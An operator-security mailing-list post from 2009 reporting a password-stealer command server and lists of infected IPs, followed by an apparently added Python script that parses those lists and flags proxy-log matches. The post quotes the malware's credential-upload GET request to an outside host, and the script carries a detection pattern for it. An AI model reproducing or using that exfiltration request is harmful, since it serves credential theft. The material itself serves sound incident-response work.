[nsp-sec] ACK 291: RE: 130K+ Infected Ips on ~3600 ASNs
Kevin Oberman
oberman at es.net
Thu Oct 1 14:58:54 EDT 2009
ACK for AS291.
--
R. Kevin Oberman, Network Engineer
Energy Sciences Network (ESnet)
Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab)
E-mail: oberman at es.net Phone: +1 510 486-8634
Key fingerprint: 059B 2DDF 031C 9BA3 14A4 EADA 927D EBB3 987B 3751
> Date: Thu, 01 Oct 2009 10:47:33 -0700
> From: Stephen Gill <gillsr at cymru.com>
> Sender: nsp-security-bounces at puck.nether.net
>
> ----------- nsp-security Confidential --------
>
> Hi Team,
>
> This password stealer head end IP appears to be quite busy:
>
> 76.73.37.250
>
> We're working w/ the ISP on takedown, however in the meantime here is a list
> of 130K+ infected IPs seen talking to it primarily via TCP 80 (reporting
> stolen credentials) and UDP 7006 - UDP 7012. I don't anticipate an IP
> takedown to last forever because they can likely re-route via DNS.
>
> ASN list:
> https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt
>
> Infected IP list:
> https://www.cymru.com/nsp-sec/Owned/stealer/
> eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt
>
> Timestamps in UTC.
>
> Some clarification on the formatting:
>
> 3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS -
> Massachusetts Institute of Technology
>
> The timestamp column will begin with a U or a T. U is for UDP, T for TCP.
> When possible we've preferred to list out a T if we have seen any TCP 80
> traffic from the client IP in question.
>
> It looks like the malware on the client may choose its source IP address
> since we noticed some RFC 1918 traffic so it is possible the UDP data will
> not match in all cases. I cannot guarantee that the UDP traffic is not part
> of some type of actual software but it sure looks suspicious. Here is a
> public URL for reference:
>
> http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html
>
> As there is UDP involved we cannot guarantee that there are 0 spoofed IPs,
> but on the TCP side that is another matter.
>
> HTTP credential stealing looks something like this:
>
> GET /pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USERNAME&p=STOLEN_PASSWORD HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible).
> Host: hotshows.org.
> .
>
>
> Cheers,
> -- steve
>
> --
> Stephen Gill, Chief Scientist, Team Cymru
> http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
>
>
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
>
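Two parts of the quoted post lend themselves to working code on the receiving end: the line format of the per-ASN lists ("ASN | IP | U/T timestamp | AS name", with U marking sightings only on the UDP ports and T marking TCP 80 traffic) and the credential-upload request shown at the end. The Python below is an added example for operators working such a list; it is not Team Cymru's tooling and not anything posted to the thread. Only the MIT line of the sample report is from the post; the other report lines, the proxy-log layout, the hypothetical moved head-end host and the confidence ranking (TCP high, UDP medium, RFC 1918 source unattributable) are constructed assumptions for illustration.

```python
import ipaddress
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import List
from urllib.parse import parse_qs, urlsplit

# --- 1. Parsing the per-ASN infected-IP list ---------------------------------
# Format as described in the post: "ASN | IP | <U|T> <UTC timestamp> | AS name".
# First line is the one quoted in the post; the other two are constructed here.
SAMPLE_REPORT = """\
3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS - Massachusetts Institute of Technology
3 | 18.26.4.10 | T 2009/10/01 04:01:02.000001 | MIT-GATEWAYS - Massachusetts Institute of Technology
3 | 10.1.2.3 | U 2009/10/01 04:05:00.000000 | MIT-GATEWAYS - Massachusetts Institute of Technology
"""

LINE_RE = re.compile(
    r"^\s*(?P<asn>\d+)\s*\|\s*(?P<ip>[\d.]+)\s*\|\s*"
    r"(?P<proto>[TU])\s+(?P<ts>\d{4}/\d\d/\d\d \d\d:\d\d:\d\d(?:\.\d+)?)\s*\|\s*(?P<name>.*)$"
)


@dataclass
class Record:
    asn: int
    ip: str
    proto: str          # "T" = seen on TCP 80, "U" = only seen on UDP 7006-7012
    seen_utc: datetime  # timestamps in the list are UTC
    as_name: str

    @property
    def confidence(self) -> str:
        # TCP completes a handshake, so the source is not spoofed: high confidence.
        # UDP sightings can be spoofed, and an RFC 1918 source cannot be attributed
        # from outside the network at all (the post notes such traffic was seen).
        if self.proto == "T":
            return "high"
        if ipaddress.ip_address(self.ip).is_private:
            return "unattributable"
        return "medium"


def parse_report(text: str) -> List[Record]:
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip blank or malformed lines instead of aborting the import
        ts = m["ts"]
        fmt = "%Y/%m/%d %H:%M:%S.%f" if "." in ts else "%Y/%m/%d %H:%M:%S"
        records.append(Record(
            asn=int(m["asn"]), ip=m["ip"], proto=m["proto"],
            seen_utc=datetime.strptime(ts, fmt).replace(tzinfo=timezone.utc),
            as_name=m["name"].strip(),
        ))
    return records


def triage(records: List[Record], my_asn: int) -> List[Record]:
    """Records for my ASN, highest confidence first, for handing to the abuse desk."""
    order = {"high": 0, "medium": 1, "unattributable": 2}
    mine = [r for r in records if r.asn == my_asn]
    return sorted(mine, key=lambda r: (order[r.confidence], r.seen_utc))


# --- 2. Spotting the credential upload in outbound proxy logs -----------------
# The post shows the stealer reporting with GET /pp2/?s=<site>&u=<user>&p=<pass>
# to Host: hotshows.org. Both the host and the parameter shape are checked so a
# DNS-based move of the head end (which the post anticipates) does not blind the rule.
STEALER_HOSTS = {"hotshows.org"}


def is_stealer_upload(method: str, host: str, target: str) -> bool:
    if method.upper() != "GET":
        return False
    if host.lower().rstrip(".") in STEALER_HOSTS:
        return True
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    return parts.path.startswith("/pp2/") and {"s", "u", "p"}.issubset(query)


# Constructed proxy log lines: "<client ip> <method> <host> <request-target>".
# The third line assumes a hypothetical new head-end hostname to show the shape match.
SAMPLE_PROXY_LOG = """\
18.26.4.9 GET hotshows.org /pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USERNAME&p=STOLEN_PASSWORD
18.26.4.11 GET www.example.org /index.php?s=search&u=1
18.26.4.12 GET moved-headend.example.invalid /pp2/?s=http%3a%2f%2fwww.example.com%2f&u=USER&p=REDACTED
"""


def flag_clients(log_text: str) -> List[str]:
    """Client IPs whose requests match the credential-upload pattern."""
    hits = []
    for line in log_text.splitlines():
        try:
            client, method, host, target = line.split()
        except ValueError:
            continue
        if is_stealer_upload(method, host, target):
            hits.append(client)
    return hits


if __name__ == "__main__":
    for rec in triage(parse_report(SAMPLE_REPORT), my_asn=3):
        print(rec.confidence, rec.ip, rec.seen_utc.isoformat())
    print("clients uploading credentials:", flag_clients(SAMPLE_PROXY_LOG))
```

The confidence ranking is the practical point of the U/T column: a T entry is worth an immediate customer notification, while a U entry from a private address is at best a hint to look at your own NAT logs. The proxy-log check complements the list, because it catches hosts inside the network that have not yet appeared in the published file.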